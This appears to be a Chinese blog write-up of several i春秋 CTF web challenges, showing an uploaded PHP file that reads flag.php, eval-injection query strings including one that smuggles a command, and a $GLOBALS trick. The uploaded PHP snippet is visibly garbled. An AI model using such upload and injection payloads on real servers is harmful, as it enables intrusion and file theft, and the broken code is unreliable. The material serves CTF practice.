题目链接https://www.ichunqiu.com/battalion
选择CTF训练,全部题库,Web分类,从通过人数排序
第一题:Misc Web 爆破-1
php代码,要求给一个6位变量
大佬题解:直接GLOBALS看所有变量就可以了
$$a提示超变量GLOBALS有效
第二题:Web Upload
提示是flag在flag.php里
直接打开发现可以看到一句here_is_flag,但是没有flag(后来知道是写在注释里了)
上传的文件在/u/xxx.xxx里
后来知道这是可以运行代码的,尝试直接上传php代码
<?php
fh,filesize("../flag.php"));
fclose(fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread(fh);
</script>
成功得到注释中的flag
第三题:Web 爆破-2
源码审计,eval( "var_dump($a);");
可以执行代码,两种方法
1)?hello=file_get_contents('flag.php')
2)?hello=file("flag.php")
3)?hello=);echo%20cat%20flag.php + ctrl + u 查看源码 (我没试出来)
flag{9bc5fa0c-37ab-4b1c-8ac0-3de6c2fed8f7}
第四题:SQL注入
sqlmap报错,不知道为什么
网友评论